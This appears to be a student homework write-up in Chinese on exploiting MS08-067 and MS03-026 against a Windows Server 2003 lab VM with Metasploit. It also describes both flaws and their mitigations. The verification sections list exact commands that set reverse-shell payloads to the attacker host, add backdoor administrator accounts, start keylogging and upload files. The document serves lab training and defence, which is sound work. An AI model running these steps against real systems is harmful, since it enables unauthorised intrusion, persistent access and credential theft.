windows server 2003 系統提權

《系統提權》作業

課程名稱：《系統提權》

【要求】

1. 對Windows Server2003操作系統MS08_067、MS03_026漏洞進行提權滲透測試；
2. 對MS03_026漏洞開啓遠程桌面服務；
3. 操作過程可自由發揮；
4. 概念越詳細越好；
5. 滲透和驗證過程必要有截圖和文字說明；
6. 其餘部分均可配文字簡介敘述；
7. 作業模板在此基礎上可以自由發揮設計；
8. 熟悉虛擬機的使用，瞭解滲透測試工具的使用方法和Linux、DOS命令

• 測試對象

 

	設備名稱	域名	IP地址
1.	Win2K3 Metasploitable	10.10.10.131	10.10.10.131
2．	kali-linux-2017.3-vm-amd64	10.10.10.130	10.10.10.130

 

二、測試工具

	工具名稱	描述
	Nmap	NMap，也就是Network Mapper，最早是Linux下的網絡掃描和嗅探工具包。 nmap是一個網絡連接端掃描軟件，用來掃描網上電腦開放的網絡連接端。確定哪些服務運行在哪些連接端，並且推斷計算機運行哪個操作系統（這是亦稱 fingerprinting）。它是網絡管理員必用的軟件之一，以及用以評估網絡系統安全。 正如大多數被用於網絡安全的工具，nmap 也是不少黑客及駭客（又稱腳本小子）愛用的工具 。系統管理員可以利用nmap來探測工作環境中未經批准使用的服務器，但是黑客會利用nmap來蒐集目標電腦的網絡設定，從而計劃攻擊的方法。 Nmap 常被跟評估系統漏洞軟件Nessus 混爲一談。Nmap 以隱祕的手法，避開闖入檢測系統的監視，並儘可能不影響目標系統的日常操作。
	metasploit	Metasploit是一款開源的安全漏洞檢測工具，可以幫助安全和IT專業人士識別安全性問題，驗證漏洞的緩解措施，並管理專家驅動的安全性進行評估，提供真正的安全風險情報。這些功能包括智能開發，代碼審計，Web應用程序掃描，社會工程。團隊合作，在Metasploit和綜合報告提出了他們的發現。     Metasploit是一個免費的、可下載的框架，通過它可以很容易地獲取、開發並對計算機軟件漏洞實施攻擊。它本身附帶數百個已知軟件漏洞的專業級漏洞攻擊工具。
	Kali Linux	Kali Linux是基於Debian的Linux發行版， 設計用於數字取證操作系統。由Offensive Security Ltd維護和資助。最先由Offensive Security的Mati Aharoni和Devon Kearns通過重寫BackTrack來完成，BackTrack是他們之前寫的用於取證的Linux發行版 。 Kali Linux預裝了許多滲透測試軟件，包括nmap 、Wireshark 、John the Ripper，以及Aircrack-ng.[2] 用戶可通過硬盤、live CD或live USB運行Kali Linux。Kali Linux既有32位和64位的鏡像。可用於x86 指令集。同時還有基於ARM架構的鏡像，可用於樹莓派和三星的ARM Chromebook

 

三、被測設備信息情況

1.基本信息

	IP	操作系統
1.	10.10.10.131	Windows server 2003

2.端口開放情況

	端口號	服務	產品版本
1.	21/tcp	ftp	Microsoft ftpd
2.	80/tcp	http	Microsoft IIS httpd 6.0
3	135/tcp	msrpc	Microsoft Windows RPC
4	139/tcp	netbios-ssn	Microsoft Windows netbios-ssn
5	445/tcp	microsoft-ds	Microsoft Windows 2003 or 2008 microsoft-ds
6	777/tcp	multiling-http	None
7	1025/tcp	msrpc	Microsoft Windows RPC
8	1026/tcp	msrpc	Microsoft Windows RPC
9	1027/tcp	msrpc	Microsoft Windows RPC
10	1029/tcp	msrpc	Microsoft Windows RPC
11	3389/tcp	ms-wbt-server	Microsoft Terminal Service
12	6002/tcp	http	SafeNet Sentinel Protection Server 7.3
13	7001/tcp	afs3-callback	None
14	7002/tcp	http	SafeNet Sentinel Keys License Monitor
15	8099/tcp	http	Microsoft IIS httpd 6.0

 

【漏洞名稱】

MS08_067

【漏洞描述】

MS08-067漏洞將會影響除Windows Server 2008 Core以外的所有Windows系統，包括：Windows 2000/XP/Server 2003/Vista/Server 2008的各個版本，甚至還包括測試階段的Windows 7 Pro-Beta。

發佈日期：2008/10/22

下載大小：因操作系統而異

說明：微軟安全公告KB958644

漏洞影響：服務器服務中的漏洞可能允許遠程執行代碼

發佈日期：2008/10/22

下載大小：因操作系統而異。

受影響的操作系統： Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta

此安全更新解決了服務器服務中一個祕密報告的漏洞。 如果用戶在受影響的系統上收到特製的 RPC 請求，則該漏洞可能允許遠程執行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統上，攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼。 此漏洞可能用於進行蠕蟲攻擊。 防火牆最佳做法和標準的默認防火牆配置有助於保護網絡資源免受從企業外部發起的攻擊。可以通過安裝本 Microsoft 更新程序來保護計算機不受侵害。安裝後，可能必須重新啓動計算機。

嚴重等級：Windows 2000;XP;Server 2003爲嚴重，Windows Vista;Server 2008;7 Beta爲重要

 

【解決措施】

MS08-067漏洞的終端用戶解決方案
　　這是一個針對139、445端口的RPC服務進行***的漏洞，可以直接獲取系統控制權。根據微軟的消息，該***無法穿透DEP機制的保護，對正版用戶，該漏洞對XPSP2以上版本（含SP2）和Server2003SP1（含SP1）系統無效，因此主要受到威脅的用戶應該是Windows2000和WindowsXPSP2以前版本用戶。但由於一些盜版傳播中，被人爲降低了安全級別或者修改過安全機制，因此除了上述版本的用戶也有可能受到***。
　　據安天介紹，一些常規的解決思路是，當有重大遠程漏洞發生時，對於不需要實時連接的系統，可以考慮先斷網檢測安全配置，然後採用調整防火牆和安全策略的方式保證聯網打補丁時段的安全，然後再進行補丁升級。
　　一、桌面與工作站用戶的安全配置方案
　　桌面系統主要以瀏覽、下載、遊戲、工作等與用戶直接操作交互爲主要應用方式，其多數網絡操作爲用戶主動對外發起連接，而不是憑藉本地監聽端口爲外部用戶提供服務。桌面系統如果不提供共享打印，不需要在局域網遊戲（如CS、FIFA等）中作爲主機使用，可以通過設置爲禁止發佈發起連接模式，來阻斷所有向本主機發起的連接。進行有關設置不會影響到操作者的瀏覽、聊天、下載、在線視頻、常見網遊等操作。
　　進行這樣的設置不僅可以阻斷MS08-067***，而且可以阻斷所有相同針對主機固定端口的***，缺點是如果主機提供打印共享、網絡共享目錄等服務則會失效，在CS、FIFA等遊戲中無法作爲host主機使用，還可能與藍波寬帶撥號程序衝突。
　　1、Windows自帶防火牆的相關配置
　　步驟1：在控制面板中找到防火牆。
　　
　　步驟2：選擇更改設置，此時Vista系統的安全機制可能需要灰屏確認，請選擇是。
　　
　　步驟3：啓動防火牆並選擇阻止所有傳入連接。
　　
　　2、其它防火牆的安全設置
　　如果Windows系統的防火牆不支持本項設置，可通過其他防火牆實現，以安天盾防火牆免費工具爲例。
　　步驟1：通過單擊Windows開始菜單中安天安全中心項目，或者單擊托盤中的安天安全中心圖標，啓動有關配置。
　　
　　步驟2：在安天安全中心界面上點擊設置,進行漏洞補丁的調試。
　　
　　步驟3：將策略選擇爲系統初裝。
　　
　　二、不需要開放RPC服務的服務器安全配置方案
　　網絡服務器用戶以固定端口對外進行服務，因此不能採用阻斷所有傳入連接的方式進行配置，否則會失效。而從WindowNTServer到Server2008，不需要開放RPC服務器的用戶可以不依賴任何安全工具，僅憑藉WindowsServer自身安全機制既可實現屏蔽，如果僅是直接關閉RPC服務，會給本機管理帶來一些麻煩。
　　步驟1：點擊右鍵，選擇網絡連接屬性。
　　
　　步驟2：點擊Internet協議（TCP/IP）屬性。
　　
　　步驟3：在彈出的Internet協議（TCP/IP）屬性對話框中點擊“高級”。
　　
　　步驟4：對TCP/IP篩選中點擊屬性。
　　
　　步驟5：在TCP/IP篩選中配置允許訪問的端口，只要不包含TCP139和445則MS08-067RPC***失效。
　　
　　三、需要開放RPC服務的服務器安全配置方案
　　需要開放RPC服務的服務器，如網絡打印、網絡共享和一些RPC通訊調用的節點，不能夠通過上述關閉端口的方式，否則會造成無效。可以轉而採用打補丁、打開DEP策略，或安裝主機IPS的方法。下面介紹一下系統DEP保護配置的方法。
　　步驟1：我的電腦右鍵點擊屬性，點擊“高級”頁中的“設置”按鈕。
　　
　　步驟2：設定數據執行保護策略，修改後重新啓動電腦。
　　
　　在這裏，進行不同的選擇會有不同的效果，如果選擇“僅爲基本Windows程序和服務啓用DEP”功能，則可以擋住本次RPC***，也可以擋住目前主流的針對Windows開放端口的***。在獲得一定的安全性的情況下，保證系統的兼容性。但是缺點是不能保護類似IE瀏覽器、Outlook等比較脆弱的互聯網應用程序，不能防範類似掛馬注入的***。
　　如果選擇“爲除下列選定程序之外的所有程序和服務啓用DEP”功能，則在上述效果的基礎上，對Web掛馬、各種應用軟件插件注入都有很好的效果，具有更強的系統安全性，不過缺點是與部分應用程序衝突，但可以通過將衝突的程序設置爲例外來解決。 
四、安裝相應補丁，解決安全隱患 
根據自己系統情況尋找地址安裝單一補丁，是一個有效修補漏洞並規避微軟黑屏策略影響的方法。 
微軟的補丁都可以離線安裝，可以選擇將有漏洞的系統斷網，從安全的系統上下載補丁再用移動存儲複製到有漏洞的系統下。 

【漏洞驗證】

1. 打開msfconsole

指令:mafconsole

1. 搜索ms08_067

指令:search ms08_067

3使用ma08_067_netapi

指令:use exploit/windows/smb/ms08_067_netapi

 

4.查看攻擊載荷

指令:Show payloads

 

5. 設置windows/meterpreter/reverse_tcp載荷

  指令: set payload windows/meterpreter/reverse_tcp

 

6.查看需要配置的參數

指令: show options

 

7.設置參數

Lhost爲攻擊方ip,rhost爲被攻擊方ip,target爲目標主機名稱

  指令: set lhost 10.10.10.130

       set rhost 10.10.10.131

       set target 3

 

 

8.發動攻擊

指令:exploit

 

9.進入shell創建用戶

指令:shell

     net user hgc 123 /add

 

10.設置爲超級用戶

指令: net localgroup administrators hgc /add

 

11.對目標主機屏幕截取

 

 

 

 

 

1. 鍵盤記錄

指令: keysscan_start

     keyscan_dump

     keyscan_stop

 

 

13.創建文件

指令:mkdir hgc

 

 

【漏洞名稱】

MS03_026

【漏洞描述】

1、Remote Procedure Call (RPC)是Windows  操作系統使用的一種遠程過程調用協議，RPC提供進程間交互通信機制，允許在某臺計算機上運行程序的無縫地在遠程系統上執行代碼。協議本身源自開放軟件基 金會的RPC協議，Microsoft在其基礎上增加了自己的一些擴展。

 

eEye的研究人員發現，由於Windows RPC DCOM接口對報文的長度域缺乏檢查導致發生基於堆的溢出，遠程***者可以利用這些漏洞以本地系統權限在系統上執行任意指令。

 

漏洞實質上影響的是使用RPC的DCOM接口，此接口處理由客戶端機器發送給服務器的DCOM對象激活請求(如UNC路徑)。***者通過向目標發送畸形 RPC DCOM請求來利用這些漏洞。成功利用此漏洞可以以本地系統權限執行任意指令。***者可以在系統上執行任意操作  ，如安裝程序、查看或更改、刪除數據或創建系統管理員權限的帳戶。

 

使用者可以通過  135(UDP/TCP)、137/UDP、138/UDP、139/TCP、445(UDP/TCP)、593/TCP端口進行攻擊。對於啓動了COM  Internet服務和RPC over HTTP的用戶來說，還可能通過80/TCP和443/TCP端口進行***。

2、Microsoft DCOM  RPC相關係統漏洞,具體內容即爲MS03-026和MS03-039.正因爲此,造成Blaster.Worm(衝擊波).以及 w32.Nachi.Worm(衝擊波殺手)蠕蟲病毒在校園網絡中的泛濫.而且DCOM RPC漏洞的remote root  ,可以讓一個不具備任何基礎知識的攻擊者,在2分鐘之內進入到你的計算機系統中,他所做的僅僅是從網上下載一個簡單的攻擊工具和一個掃描工具就可以了.

查找ms03-026系統漏洞的利用：

msf>search ms03_026

顯示找到的ms03-026的路徑

msf>use exploit/windows/.../ms03_026_dcom

 

進入後可以輸入

msf exploit(ms03_026_dcom) > show options

來查看所需要輸入的參數

 

msf exploit(ms03_026_dcom) > show payloads

顯示當前模塊的所有攻擊載荷。攻擊載荷是我們希望在目標系統被滲透後去執行的代碼。

msf exploit(ms03_026_dcom) > set PAYLOAD generic/shell_reverse_tcp

選擇一個反彈式的shell

 

msf exploit(ms03_026_dcom) > set RHOST 192.168.250.157

msf exploit(ms03_026_dcom) > set LHOST 192.168.250.135

輸入靶機地址和攻擊機的地址

 

msf exploit(ms03_026_dcom) > exploit

開始進行滲透攻擊

【解決措施】

解決方法:首先，打開“管理工具”→“服務”管理器，在服務管理器的主窗口服務列表中，找到名稱爲“Cryptographic Services”的服務項，雙擊該服務項，在彈出的該服務項屬性對話框中，單擊“停止”按鈕，停止該服務。然後，在資源管理器中，打開系統安裝目錄\\System32\\文件夾，在該文件夾下，找到名爲“catroot2”的文件夾，將其刪除或重命名。最後在服務管理器中，將“Cryptographic Services”服務啓動，並安裝系統漏洞補丁，一般就可以正常安裝系統補丁了

通過命令行的方法來解決:1、在開始中運行cmd，2、在窗口中運行net stop cryptsvc，回車，3、ren %systemroot%\system32\catroot2 oldcatroot2，回車，4、net start cryptsvc，回車，5、exit，回車。然後就可以了

其實其實現過程是一樣的。把Cryptographic Services這個服務給修復好就可以了。
某些XP用戶在安裝MS03-026補丁出現提示“安裝程序不能驗證update.inf完整性，請確定加密服務正在此計算機上運行”，點擊確定後就退出。

即使在命令行提示符下輸入
net start cryptographic service

1、在開始中運行cmd
2、在窗口中運行net stop cryptsvc，
3、ren %systemroot%\system32\catroot2 oldcatroot2，
4、net start cryptsvc，

【漏洞驗證】

1. 打開msfconsole

指令:msfconsole

1. 查找MS03_026

指令search MS03_026

 

3.執行該文件

指令: use exploit/windows/dcerpc/ms03_026_dcom

 

4.查看攻擊載荷

指令:show payload

5.設置攻擊載荷

  指令: set payload windows/meterpreter/reverse_tcp

 

 

6.查看需要設置的參數

  指令: show options

7.設置參數

Lhost爲攻擊方ip,rhost爲被攻擊方ip,target爲目標主機名稱

  指令: set lhost 10.10.10.130

       set rhost 10.10.10.131

       set target  0

 

 

8.開始運行

1. 創建用戶

 指令: net user hgc2 123 /add

 

1. 添加爲系統管理員

  指令: net localgroup administrators hgc2 /add

 

11.遠程桌面登錄

 

成功連接遠程主機

 

新建文件夾

 

返回虛擬機查看

可以看到文件夾成功出現,這表明系統管理員賬戶創建成功,遠程主機連接成功

 

 

 

 

12.上傳文件

  指令:upload /root/user.txt

返回windows 2003查看

 

教程下載地址:https://download.csdn.net/download/qq_38162763/10594297

本次教程結束